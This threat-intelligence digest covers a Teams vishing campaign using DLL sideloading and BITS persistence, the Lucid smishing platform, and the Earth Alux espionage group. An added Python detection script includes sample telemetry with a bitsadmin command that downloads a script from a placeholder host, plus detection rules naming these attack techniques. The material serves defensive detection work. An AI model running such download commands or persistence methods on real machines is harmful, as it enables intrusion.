Update: Teams Vishing Campaign Shifts Toward Persistence and Stealth
A recent intrusion analyzed by Ontinue’s Cyber Defense Centre demonstrates the continued evolution of Teams-based vishing campaigns, first observed in late 2024 and previously linked to Storm-1811. In this case, attackers initiated contact through Microsoft Teams messages and vishing calls to guide users into running a PowerShell command. This command downloaded a payload that served as the entry point for a larger attack chain. Once initial access was secured, Quick Assist was used to establish remote control, followed by the silent deployment of a signed TeamViewer executable. The attackers then sideloaded a malicious DLL (TV.dll) into the trusted binary to blend into legitimate system processes. This sideloading technique has become a core part of the group’s playbook, allowing them to remain active without drawing attention from typical monitoring tools. To maintain access, the attackers dropped a shortcut into the startup folder and leveraged Background Intelligent Transfer Service (BITS) jobs to silently move files over extended periods. A second-stage backdoor, written in JavaScript and executed via Node.js, provided long-term command-and-control through socket connections. These methods reflect a clear shift from quick-hit payload delivery to long-term persistence, using built-in Windows features and signed binaries to minimize detection. The overall approach is consistent with earlier campaigns we documented involving Storm-1811, but this instance shows greater emphasis on stealth and durability. It highlights the ongoing risk of social engineering, where attackers bypass technical defenses by targeting human trust, and reinforces that common tools—when misused—remain some of the most dangerous elements in the threat landscape.
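One way a detection team could correlate host telemetry for the persistence chain described above (Quick Assist, TeamViewer with a sideloaded TV.dll, a startup-folder shortcut, BITS transfers, and a Node.js socket backdoor), written as an added example that is not part of Ontinue's report. The event shapes, file paths, and the three-indicator threshold are assumptions; the sample events are constructed.

```python
"""Correlate constructed Sysmon-style host events for the Teams-vishing persistence chain."""
import re

STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)

def _img(e, name):
    return e.get("image", "").lower().endswith("\\" + name)

# (indicator name, predicate). Field names and paths are assumptions, not from the report.
RULES = [
    ("quick_assist_session", lambda e: e["type"] == "process" and _img(e, "quickassist.exe")),
    # Signed TeamViewer.exe loading TV.dll from outside its install path is the sideload tell.
    ("teamviewer_sideload", lambda e: e["type"] == "imageload" and _img(e, "teamviewer.exe")
        and e["loaded"].lower().endswith("\\tv.dll")
        and "\\program files" not in e["loaded"].lower()),
    ("startup_lnk_dropped", lambda e: e["type"] == "filecreate" and bool(STARTUP_LNK.search(e["path"]))),
    ("bits_transfer", lambda e: e["type"] == "process"
        and ("start-bitstransfer" in e["cmdline"].lower()
             or (_img(e, "bitsadmin.exe") and "/transfer" in e["cmdline"].lower()))),
    ("node_outbound_socket", lambda e: e["type"] == "netconn" and _img(e, "node.exe")),
]

def correlate(events, threshold=3):
    """Map host -> sorted indicator names for hosts that hit at least `threshold` distinct rules."""
    hits = {}
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.setdefault(e["host"], set()).add(name)
    return {h: sorted(n) for h, n in hits.items() if len(n) >= threshold}

# Constructed sample telemetry: ws01 shows the full chain; ws02 is a developer box running Node.
EVENTS = [
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\quickassist.exe", "cmdline": "quickassist.exe"},
    {"host": "ws01", "type": "imageload", "image": r"C:\Users\u\AppData\Local\Temp\TeamViewer.exe",
     "loaded": r"C:\Users\u\AppData\Local\Temp\TV.dll"},
    {"host": "ws01", "type": "filecreate",
     "path": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"},
    {"host": "ws01", "type": "process", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer job /download /priority low http://example.invalid/s.js C:\\Users\\u\\s.js"},
    {"host": "ws01", "type": "netconn", "image": r"C:\Users\u\node\node.exe", "dest": "198.51.100.7:4444"},
    {"host": "ws02", "type": "netconn", "image": r"C:\Program Files\nodejs\node.exe", "dest": "registry.npmjs.org:443"},
]

if __name__ == "__main__":
    print(correlate(EVENTS))  # only ws01 reaches the threshold; ws02's lone Node connection does not
```

Any single indicator here (a Node.js process, a BITS job, a startup shortcut) is common on its own; the value is in requiring several of them on the same host within an investigation window.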
Update: Lucid PhaaS Elevates Global Smishing With Encrypted Messaging and Device Farms
We previously documented Darcula, a phishing-as-a-service (PhaaS) platform that leveraged similar tactics, and Lucid now emerges as a parallel—but more mobile-focused—operation with its own infrastructure and delivery methods. Operated by the Chinese-speaking 'XinXin group' since mid-2023, Lucid enables cybercriminals to carry out high-volume phishing campaigns through encrypted messaging services like iMessage and Rich Communication Services (RCS), avoiding traditional spam filtering. Victims receive geo-targeted smishing lures impersonating logistics companies, tax agencies, toll systems, or banks. These messages link to professionally designed phishing pages that capture sensitive data, including payment details. A built-in credit card validator ensures real-time utility of stolen credentials, making fraud or resale instant and profitable. The campaign’s use of end-to-end encrypted delivery, regional customization, and adaptive branding demonstrates a shift toward mobile-first, infrastructure-light phishing that’s harder to monitor and disrupt at scale. Lucid is sold via Telegram under a weekly subscription model and grants access to over 1,000 phishing domains and auto-generated phishing sites. The platform runs on large-scale iOS and Android device farms that use temporary Apple IDs and exploit weak points in RCS implementations to bypass sender validation. Video evidence shows actors launching these campaigns from moving vehicles—an operational security tactic doubling as advertising for how simple the platform is to use. This "gamification" of phishing lowers the barrier for entry-level cybercriminals while maintaining professional-grade results. The campaign’s precision and reliance on trusted mobile infrastructure align with a broader trend of phishing toolkits becoming modular, portable, and increasingly protocol-aware.
With targeted operations now spanning 88 countries and at least 169 organizations, Lucid reflects how PhaaS has matured into a global commodity—fast, scalable, and dangerously easy to use.
Earth Alux: Emerging China-Linked Threat Actor Targets APAC and LATAM with Evasive Malware
Earth Alux is a newly identified China-linked threat actor that has steadily expanded its reach across Asia-Pacific and Latin America since mid-2023. Initially observed targeting government and enterprise infrastructure in Thailand, Taiwan, and Malaysia, the group has since extended operations into Brazil and other Latin American nations. Its attacks begin with exploiting vulnerable, internet-facing web applications used to deploy the Godzilla web shell. This foothold allows Earth Alux to drop a suite of stealthy, modular malware, including two key backdoors: VARGEIT and COBEACON. VARGEIT stands out for its ability to load tools into processes like Microsoft Paint, enabling fileless reconnaissance and data exfiltration. In contrast, COBEACON—based on Cobalt Strike—is deployed earlier in the infection chain via loaders like MASQLOADER or RSBINJECT. The group’s malware ecosystem includes additional components like RAILLOAD and RAILSETTER, which are designed for persistence and timestomping, and deployed using DLL side-loading to remain covert. Earth Alux’s operations are marked by aggressive evasion tactics, including anti-hooking techniques that modify NTDLL.dll to bypass endpoint detection. VARGEIT is particularly versatile, supporting ten communication channels including DNS, ICMP, HTTP, and Microsoft Outlook via Graph API, where commands are exchanged using the drafts folder of attacker-controlled mailboxes. The group uses open-source Chinese tools like ZeroEye and VirTest to test for side-loadable executables and to validate that their malware remains undetectable. Earth Alux's continued development and deployment of these tools reflect an advanced and persistent cyber-espionage operation focused on long-term access, lateral movement, and stealth—positioning them as a serious and adaptive threat actor.